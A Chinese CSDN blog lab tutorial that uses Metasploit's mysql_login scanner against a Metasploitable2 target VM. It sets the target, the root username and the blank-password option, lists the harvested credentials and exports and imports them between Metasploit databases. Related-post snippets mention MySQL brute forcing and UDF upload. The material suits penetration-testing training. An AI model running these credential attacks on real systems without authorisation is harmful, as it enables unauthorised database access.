使用msf 扫描靶机上的mysql服务的空密码

最新推荐文章于 2022-11-24 10:52:12 发布
最新推荐文章于 2022-11-24 10:52:12 发布
阅读量570 收藏 2
点赞数 3
分类专栏: 网络安全工具 文章标签: metasploit mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fengzilin1973/article/details/115966716
版权

使用msf 扫描靶机上的mysql服务的空密码

文章目录


实验环境

  • kali Linux 2019.1a
  • Metasploittable2- Linux

一、实验拓扑

image-20210214205028673

二、尝试破解MySQL的空密码

打开终端进入 msf 搜索模块并加载模块

msf5 > search mysql_login
msf5 > use auxiliary/scanner/mysql/mysql_login

image-20210214205413094

查看配置选项并设置模块项

msf5 auxiliary(scanner/mysql/mysql_login) > show options
msf5 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.37.140      //设置主机地址
msf5 auxiliary(scanner/mysql/mysql_login) > set USERNAME root							//爆破的用户
msf5 auxiliary(scanner/mysql/mysql_login) > set BLANK_PASSWORDS true       //为所有用户尝试空密码

image-20210214205810097

配置完成后运行,可以使用run 和exploit

msf5 auxiliary(scanner/mysql/mysql_login) > run

image-20210214221632190

使用 后端凭证命令 creds ,列出数据库中的所有凭据

msf5 auxiliary(scanner/mysql/mysql_login) > creds

image-20210214221733404

三、将扫描的记过导出 Metasploit 与导入另一台机器的 Metasploit 中

3.1 将前面扫描的MySQL数据库空密码信息导出

msf5 auxiliary(scanner/mysql/mysql_login) > db_export -f xml /root/bak.xml

导出只支持两种格式:xml 和 pwdump

常用的导出格式为 xml

image-20210214222008145

导出后退出程序

msf5 auxiliary(scanner/mysql/mysql_login) > exit

为了演示效果 ,我们重置当前数据库,当成新的来用

root@fengzilin53:~# msfdb reinit 
root@fengzilin53:~# msfconsole

image-20210214222303192

查看主机信息

msf5 > hosts

image-20210214222411372

数据库中主机信息是空的,我们导入数据

msf5 > db_import /root/bak.xml

image-20210214222605386

再次输入 hosts 发现导入成功

msf5 > hosts

image-20210214222732166

丰梓林
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
kali Linux-网络安全实战-使用msf扫描靶机mysql服务密码
xueshenlaila的博客
12-22 5846
实战-使用msf扫描靶机mysql服务密码 我们启动一台Metasploitable2-Linux靶机网络模式为桥接IP:192.168.1.180 登录Metasploitable2-Linux系统用户名root,密码:123456 输入ip a 查看ip地址 登录Kali开始搜索模块 msf6> search mysql_login 加载模块 msf6 > use auxiliary/scanner/mysql/mysql_login 查看模块配置项 msf6 auxilia
网络安全kali渗透学习 web渗透入门 使用msf扫描靶机mysql服务密码
xueshenlaila的博客
03-02 3211
我们启动一台Metasploitable2-Linux靶机网络模式为桥接IP:192.168.1.180
msf扫描靶机mysql密码
Deeeelete的博客
02-19 598
完整步骤: msf5 > use auxiliary/scanner/mysql/mysql_login msf5 auxiliary(scanner/mysql/mysql_login) > show options Module options (auxiliary/scanner/mysql/mysql_login): Name Current...
【渗透实战】使用msf扫描靶机mysql服务密码
yummy11111的博客
03-28 3511
实战-使用msf扫描靶机mysql服务密码 metasploit靶机:网络模式为桥接模式 IP:192.168.111.138 账号:root 密码:root 查看是否存在密码,有的话之后就加载辅助模块 查看密码模块:可以看到是true(如果是false则要设置为true) 设置RHOSTS(目标机的IP地址) 4、run或者是exploit(成功检测出存在密码使用命令creds,列出数据库中的所有凭证 以xml文件的形式导出文件 ...
实战-msf扫描靶机mysql服务密码
保持微笑的博客
01-15 1203
靶机的安装我们在上面的文章里讲解过了。 操作流程: kali系统的IP是192.168.0.109。启动一台Metasploitable2-Linux靶机,网络模式设置为桥接。 登录Metasploitable2-Linux系统用户名root,密码:root 查看靶机的ip 因为要查的是mysql密码,涉及到登陆问题。我们可以去查login。 加载模块 查看需要设置的参数 设置目标主机 设置目标账号 查看 BLANK_PASSWORDS 是否...
msf攻击Mysql服务.docx
04-26
1. **auxiliary/scanner/mysql/mysql_login**:此模块用于扫描内网中的MySQL服务器,尝试使用不同用户名和密码进行登录测试。这在确定潜在的弱凭证或未授权访问时非常有用。 2. **exploit/multi/mysql/mysql_udf_...
E004-渗透测试常用工具-使用MSF实现Web传递获取靶机权限.pdf
12-02
11. **Meterpreter会话**:当靶机执行了恶意代码,Meterpreter会话会在渗透机上建立,允许攻击者在靶机上执行各种命令,进一步控制和收集信息。 总的来说,这个过程演示了如何利用Metasploit框架进行Web渗透测试,...
msf攻击FTP 服务.docx
04-26
通过图文并茂的方式详细描述了利用msf框架进行ftp攻击的过程,文中包含了命令和步骤,很详细,给初学者作为参考。
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
MSFconsole可以辅助完成这些步骤,例如使用nmap模块进行端口扫描,利用exploits进行攻击,通过payloads在目标系统上建立持久化通道。 4. **Windows兼容性**:虽然Metasploit通常与Linux环境关联,但其Windows版本...
msf使用方法
06-29
msf使用方法,很详细,你值得拥有
Metasploit扫描Mysql弱口令
weixin_33672109的博客
09-01 602
msf > db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml msf连接数据库[*] Rebuilding the module cache in the background...msf > db_status 查看数据库连接状态[*] postgresql connected to...
mysql弱口令msf_Metasploit扫描Mysql弱口令
weixin_28818721的博客
01-19 220
msf > db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml msf连接数据库[*] Rebuilding the module cache in the background...msf > db_status 查看数据库连接状态[*] postgresql connected to msf3msf &g...
msf --攻击MySQL 和简单实用
代码审计
04-21 4198
msfdb run(可以自动链接数据库) hosts services use auxiliary/scanner/mysql/mysql_version set PASS_FILE /home/kali/Desktop/yui.txt set exploit 步骤 mysql 爆破 root 密码 mysql_udf 上传udf mysql_sql 将执行的语句进行hex ...
mysql账号和扫描_metasploit扫描MySQL用户名和密码
weixin_33023513的博客
02-04 277
msf > db_connect -y /opt/metasploit/apps/pro/ui/config/database.yml msf连接数据库[*] Rebuilding the module cache in the background...msf > db_status 查看数据库连接状态[*] postgresql connected to msf3msf &g...
千万不要再这样操作MySQL了,分分钟给你破解
笨办法学linux的博客
08-28 1227
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。
6-21漏洞利用-mysql弱口令破解
山兔的博客
07-28 2365
Mysql是一个关系型数据库管理系统,由瑞典MySQLAB公司开发,目前属于Oracle旗下产品。Mysql是最流行的关系型数据库管理系统之一,在WEB应用方面,mysql是最好的RDBMS(RelationalDatabaseManagementSystem,关系数据库管理系统)应用软件。每一段内容存储到表当中,多张表进行对应的组合,存储对应的数据,内键、外键、唯一的索引,不同的值,都有对应的联系,这就是我们关系数据库的大概。...
MySQL口令扫描渗透测试攻略
Fly_鹏程万里
07-07 5477
对于MySQL数据库渗透来说,获取其口令至关重要,一般来讲数据库不会提供对外连接,安全严格的将会限制固有IP和本机登录数据库,但渗透就是发现各种例外!抱着研究的目地,将目前市面上主流的7款MySQL口令扫描工具进行实际测试,并给出了实际利用场景的具体命令,在进行渗透测试时,具有较高的参考价值。1.测试环境:Windows 2003 Server +PHP+MySQL5.0.90-community...
Kali系统MSF模块暴力破解MySQL弱口令漏洞
mooyuan的博客
11-24 8717
攻击环境使用KALI系统(使用虚拟机搭建)的Metasploit模块,msfconsole是metasploit中的一个工具,它集成了很多漏洞的利用的脚本,并且使用起来很简单的网络安全工具。这里要特别强调:被攻击的环境必须开启mysql远程登陆服务,通常MySQL开启的端口号是3306,故而一般情况下要求被攻击的服务器开启了3306端口号。
零基础Web安全渗透工程师精品就业班
07-14
1、熟练掌握Kali操作系统的使用2、熟练掌握metasploit框架进行渗透测试3、熟练掌握SQL注入的原理以及绕过技巧。4、每章节课时都有2小时,建议每天学习1章节,然后充分练习、实践、总结。
怎么使用msf的安全扫描工具
最新发布
02-21
使用Metasploit安全扫描工具非常简单,只需要几个步骤:1.下载Metasploit安全扫描工具;2.安装Metasploit安全扫描工具;3.运行Metasploit安全扫描工具;4.扫描系统,查看是否存在安全漏洞。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值